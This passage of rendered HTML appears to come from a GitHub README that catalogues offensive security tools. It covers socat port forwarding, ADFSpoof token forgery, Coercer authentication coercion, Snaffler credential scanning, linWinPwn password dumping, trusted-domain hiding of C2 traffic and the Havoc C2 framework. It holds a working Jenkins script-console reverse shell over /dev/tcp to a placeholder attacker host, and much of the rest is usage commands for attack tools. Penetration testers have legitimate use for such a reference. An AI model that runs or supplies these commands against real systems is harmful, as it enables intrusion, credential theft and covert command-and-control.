0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Sometimes, after gaining access to an endpoint there are local ports. Making these internal ports external routable can help for lateral movement to other services on the host.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 & socat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT &"><pre>socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 <span class="pl-k">&</span> socat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT <span class="pl-k">&</span></pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Jenkins reverse shell</h3><a id="user-content-jenkins-reverse-shell" class="anchor" aria-label="Permalink: 🔙Jenkins reverse shell" href="#jenkins-reverse-shell"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">If you gain access to a jenkins script console you can use this to gain a reverse shell on the node.</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP_ADDRESS/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()"><pre lang="jenkins" class="notranslate"><code>r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP_ADDRESS/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() </code></pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/mandiant/ADFSpoof">ADFSpoof</a></h3><a id="user-content-adfspoof" class="anchor" aria-label="Permalink: 🔙ADFSpoof" href="#adfspoof"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Created by Doug Bienstock <a href="https://twitter.com/doughsec" rel="nofollow">@doughsec</a> while at Mandiant FireEye.</p> <p dir="auto">ADFSpoof has two main functions:</p> <ol dir="auto"> <li>Given the EncryptedPFX blob from the AD FS configuration database and DKM decryption key from Active Directory, produce a usable key/cert pair for token signing.</li> <li>Given a signing key, produce a signed security token that can be used to access a federated application.</li> </ol> <p dir="auto">This tool is meant to be used in conjunction with ADFSDump. ADFSDump runs on an AD FS server and outputs important information that you will need to use ADFSpoof.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto"><strong>Note:</strong> <em>ADFSpoof requires the installation of a custom fork of the Python Cryptography package, available <a href="https://github.com/dmb2168/cryptography">here</a>.</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/mandiant/ADFSpoof pip install -r requirements.txt"><pre>git clone https://github.com/mandiant/ADFSpoof pip install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Decrypt the EncryptedPFX and write to disk python ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump # Generate a security token for Office365 python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759"><pre><span class="pl-c"><span class="pl-c">#</span> Decrypt the EncryptedPFX and write to disk</span> python ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump <span class="pl-c"><span class="pl-c">#</span> Generate a security token for Office365</span> python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759</pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/mandiant/ADFSpoof#usage">here</a>.</p> <p dir="auto">Additional command examples can be found <a href="https://github.com/mandiant/ADFSpoof#examples">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/211530527-02e63fe3-5dda-4a81-8895-c140aec4eeca.png"><img src="https://user-images.githubusercontent.com/100603074/211530527-02e63fe3-5dda-4a81-8895-c140aec4eeca.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/mandiant/ADFSpoof#usage">https://github.com/mandiant/ADFSpoof#usage</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/p0dalirius/Coercer">Coercer</a></h3><a id="user-content-coercer" class="anchor" aria-label="Permalink: 🔙Coercer" href="#coercer"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.</p> <p dir="auto">Features:</p> <ul dir="auto"> <li>Lists open SMB pipes on the remote machine (in modes scan authenticated and fuzz authenticated)</li> <li>Tries to connect on a list of known SMB pipes on the remote machine (in modes scan unauthenticated and fuzz unauthenticated)</li> <li>Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.</li> <li>Random UNC paths generation to avoid caching failed attempts (all modes)</li> <li>Configurable delay between attempts with --delay</li> </ul> <p dir="auto">More feature information <a href="https://github.com/p0dalirius/Coercer#features">here</a>.</p> <p dir="auto"><strong>Install: (pip)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo python3 -m pip install coercer"><pre>sudo python3 -m pip install coercer</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Scan mode (Assess the Remote Procedure Calls listening on a machine) ./Coercer.py scan -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v # Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder) ./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v # Fuzz mode (Fuzz Remote Procedure Calls listening on a machine) ./Coercer.py fuzz -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v"><pre><span class="pl-c"><span class="pl-c">#</span> Scan mode (Assess the Remote Procedure Calls listening on a machine)</span> ./Coercer.py scan -t 192.168.1.1 -u <span class="pl-s"><span class="pl-pds">'</span>username<span class="pl-pds">'</span></span> -p <span class="pl-s"><span class="pl-pds">'</span>password<span class="pl-pds">'</span></span> -d test.locl -v <span class="pl-c"><span class="pl-c">#</span> Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder)</span> ./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u <span class="pl-s"><span class="pl-pds">'</span>username<span class="pl-pds">'</span></span> -p <span class="pl-s"><span class="pl-pds">'</span>password<span class="pl-pds">'</span></span> -d test.locl -v <span class="pl-c"><span class="pl-c">#</span> Fuzz mode (Fuzz Remote Procedure Calls listening on a machine)</span> ./Coercer.py fuzz -t 192.168.1.1 -u <span class="pl-s"><span class="pl-pds">'</span>username<span class="pl-pds">'</span></span> -p <span class="pl-s"><span class="pl-pds">'</span>password<span class="pl-pds">'</span></span> -d test.locl -v</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216737001-3195a6c4-3d41-431d-88ce-ed35ed474d33.png"><img src="https://user-images.githubusercontent.com/100603074/216737001-3195a6c4-3d41-431d-88ce-ed35ed474d33.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/p0dalirius/Coercer#quick-start">https://github.com/p0dalirius/Coercer#quick-start</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Collection</h1><a id="user-content-collection" class="anchor" aria-label="Permalink: Collection" href="#collection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/BloodHoundAD/BloodHound">BloodHound</a></h3><a id="user-content-bloodhound" class="anchor" aria-label="Permalink: 🔙BloodHound" href="#bloodhound"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">An application used to visualize active directory environments. A quick way to visualise attack paths and understand victims' active directory properties.</p> <p dir="auto"><strong>Install:</strong> <a href="https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/" rel="nofollow">PenTestPartners Walkthrough</a></p> <p dir="auto"><strong>Custom Queries:</strong> <a href="https://github.com/CompassSecurity/BloodHoundQueries">CompassSecurity BloodHoundQueries</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/206549387-a63e5f0e-aa75-47f6-b51a-942434648ee2.png"><img src="https://user-images.githubusercontent.com/100603074/206549387-a63e5f0e-aa75-47f6-b51a-942434648ee2.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/SnaffCon/Snaffler">Snaffler</a></h3><a id="user-content-snaffler" class="anchor" aria-label="Permalink: 🔙Snaffler" href="#snaffler"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Snaffler is an advanced credential scanner/collector for Active Directory environments. <em>With a great <a href="https://github.com/SnaffCon/Snaffler/blob/master/README.md">README</a></em>.</p> <p dir="auto">Snaffler uses a system of "classifiers", each of which examine shares or folders or files or file contents, passing some items downstream to the next classifier, and discarding others. Each classifier uses a set of rules to decide what to do with the items it classifies.</p> <p dir="auto"><em>More information about Snaffler <a href="https://github.com/SnaffCon/Snaffler#i-am-a-mighty-titan-of-tedium-a-master-of-the-mundane-i-wish-to-write-my-own-ruleset">rules</a>.</em></p> <p dir="auto">'<em>Broadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.</em>' - Snaffler README (2023)</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">You can download the binary from the <a href="https://github.com/SnaffCon/Snaffler/releases">GitHub Releases Page</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Targeted local scan (less likely to trigger detections) Snaffler.exe -s -i C:\ # Go in loud and find everything snaffler.exe -s -o snaffler.log"><pre><span class="pl-c"><span class="pl-c">#</span> Targeted local scan (less likely to trigger detections)</span> Snaffler.exe -s -i C:\ <span class="pl-c"><span class="pl-c">#</span> Go in loud and find everything</span> snaffler.exe -s -o snaffler.log</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266420-a658a48e-2945-4d06-9aff-e3fb14664829.png"><img src="https://user-images.githubusercontent.com/100603074/210266420-a658a48e-2945-4d06-9aff-e3fb14664829.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/SnaffCon/Snaffler#what-does-it-look-like">https://github.com/SnaffCon/Snaffler#what-does-it-look-like</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/lefayjey/linWinPwn">linWinPwn</a></h3><a id="user-content-linwinpwn" class="anchor" aria-label="Permalink: 🔙linWinPwn" href="#linwinpwn"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks.</p> <p dir="auto">The script uses a number of tools and serves as wrapper of them. Tools include: impacket, bloodhound, crackmapexec, enum4linux-ng, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, certipy, silenthound, and others.</p> <p dir="auto">linWinPwn is particularly useful when you have access to an Active Directory environment for a limited time only, and you wish to automate the enumeration process and collect evidence efficiently.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/lefayjey/linWinPwn cd linWinPwn; chmod +x linWinPwn.sh chmod +x install.sh ./install.sh"><pre>git clone https://github.com/lefayjey/linWinPwn <span class="pl-c1">cd</span> linWinPwn<span class="pl-k">;</span> chmod +x linWinPwn.sh chmod +x install.sh ./install.sh</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Default: interactive - Open interactive menu to run checks separately ./linWinPwn.sh -t <Domain_Controller_IP> [-d <AD_domain> -u <AD_user> -p <AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]> -o <output_dir>] # Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules ./linWinPwn.sh -t <Domain_Controller_IP> --auto-config # LDAPS - Use LDAPS instead of LDAP (port 636) ./linWinPwn.sh -t <Domain_Controller_IP> --ldaps # Module pwd_dump: Password Dump ./linWinPwn.sh -t <Domain_Controller_IP> -M pwd_dump [-d <AD_domain> -u <AD_user> -p <AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]> -o <output_dir>]"><pre><span class="pl-c"><span class="pl-c">#</span> Default: interactive - Open interactive menu to run checks separately</span> ./linWinPwn.sh -t <span class="pl-k"><</span>Domain_Controller_IP<span class="pl-k">></span> [-d <span class="pl-k"><</span>AD_domain<span class="pl-k">></span> <span class="pl-k">-u</span> <span class="pl-k"><</span>AD_user<span class="pl-k">></span> <span class="pl-k">-p</span> <span class="pl-k"><</span>AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]<span class="pl-k">></span> <span class="pl-k">-o</span> <span class="pl-k"><</span>output_dir<span class="pl-k">></span>] <span class="pl-c"><span class="pl-c">#</span> Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules</span> ./linWinPwn.sh -t <span class="pl-k"><</span>Domain_Controller_IP<span class="pl-k">></span> --auto-config <span class="pl-c"><span class="pl-c">#</span> LDAPS - Use LDAPS instead of LDAP (port 636)</span> ./linWinPwn.sh -t <span class="pl-k"><</span>Domain_Controller_IP<span class="pl-k">></span> --ldaps <span class="pl-c"><span class="pl-c">#</span> Module pwd_dump: Password Dump</span> ./linWinPwn.sh -t <span class="pl-k"><</span>Domain_Controller_IP<span class="pl-k">></span> -M pwd_dump [-d <span class="pl-k"><</span>AD_domain<span class="pl-k">></span> <span class="pl-k">-u</span> <span class="pl-k"><</span>AD_user<span class="pl-k">></span> <span class="pl-k">-p</span> <span class="pl-k"><</span>AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]<span class="pl-k">></span> <span class="pl-k">-o</span> <span class="pl-k"><</span>output_dir<span class="pl-k">></span>]</pre></div> <p dir="auto">Full usage information <a href="https://github.com/lefayjey/linWinPwn#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216737032-57ceff01-2606-474d-a745-b39fb4997ea1.png"><img src="https://user-images.githubusercontent.com/100603074/216737032-57ceff01-2606-474d-a745-b39fb4997ea1.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/lefayjey/linWinPwn#demos">https://github.com/lefayjey/linWinPwn#demos</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Command and Control</h1><a id="user-content-command-and-control" class="anchor" aria-label="Permalink: Command and Control" href="#command-and-control"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://lots-project.com/" rel="nofollow">Living Off Trusted Sites Project</a></h3><a id="user-content-living-off-trusted-sites-project" class="anchor" aria-label="Permalink: 🔙Living Off Trusted Sites Project" href="#living-off-trusted-sites-project"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">C2 implants can be detected by defenders looking for unusual network traffic to uncommon domains. Additionally proxy solutions can sometimes block connections to untrusted domains.</p> <p dir="auto">Being able to hide your C2 traffic via a trusted domain will help you to stay undetected and reduce the likelihood of being blocked at the proxy level by security solutions.</p> <p dir="auto">This resource contains a list of trusted sites that can be used.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Visit <a href="https://lots-project.com/" rel="nofollow">https://lots-project.com/</a></p> <p dir="auto">Search for <code>+C&C</code> in the search bar to view all potential domains / subdomains that can be used for command and control operations.</p> <p dir="auto">Results include:</p> <ul dir="auto"> <li>raw.githubusercontent.com</li> <li>docs.google.com</li> <li>*.azurewebsites.net</li> <li>dropbox.com</li> <li>*.amazonaws.com</li> </ul> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/220959716-85a7f403-95af-441b-9cbf-f6c278be6652.png"><img src="https://user-images.githubusercontent.com/100603074/220959716-85a7f403-95af-441b-9cbf-f6c278be6652.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://lots-project.com/" rel="nofollow">https://lots-project.com/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/HavocFramework/Havoc">Havoc</a></h3><a id="user-content-havoc" class="anchor" aria-label="Permalink: 🔙Havoc" href="#havoc"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Havoc is a modern and malleable post-exploitation command and control framework, created by <a href="https://twitter.com/C5pider" rel="nofollow">@C5pider</a>.</p> <p dir="auto">Features include: Sleep Obfuscation, x64 return address spoofing, Indirect Syscalls for Nt* APIs</p> <p dir="auto"><strong>Pre-requisites:</strong> (Ubuntu 20.04 / 22.04)</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install build-essential sudo add-apt-repository ppa:deadsnakes/ppa sudo apt update sudo apt install python3.10 python3.10-dev"><pre>sudo apt install build-essential sudo add-apt-repository ppa:deadsnakes/ppa sudo apt update sudo apt install python3.10 python3.10-dev</pre></div> <p dir="auto"><strong>Build + Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/HavocFramework/Havoc.git cd Havoc/Client make ./Havoc "><pre>git clone https://github.com/HavocFramework/Havoc.git <span class="pl-c1">cd</span> Havoc/Client make ./Havoc </pre></div> <p dir="auto"><strong>Pre-requisites:</strong> (Ubuntu 20.04 / 22.04)</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="cd Havoc/Teamserver go mod download golang.org/x/sys go mod download github.com/ugorji/go"><pre><span class="pl-c1">cd</span> Havoc/Teamserver go mod download golang.org/x/sys go mod download github.com/ugorji/go</pre></div> <p dir="auto"><strong>Build + Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="cd Teamserver ./Install.sh make ./teamserver -h"><pre><span class="pl-c1">cd</span> Teamserver ./Install.sh make ./teamserver -h</pre></div> <p dir="auto"><strong>Run the teamserver</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug"><pre>sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug</pre></div> <p dir="auto"><em>Full install, build and run instructions on the <a href="https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD">wiki</a></em></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/206025215-9c7093e5-b45a-4755-81e6-9e2a52a1f455.png"><img src="https://user-images.githubusercontent.com/100603074/206025215-9c7093e5-b45a-4755-81e6-9e2a52a1f455.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a 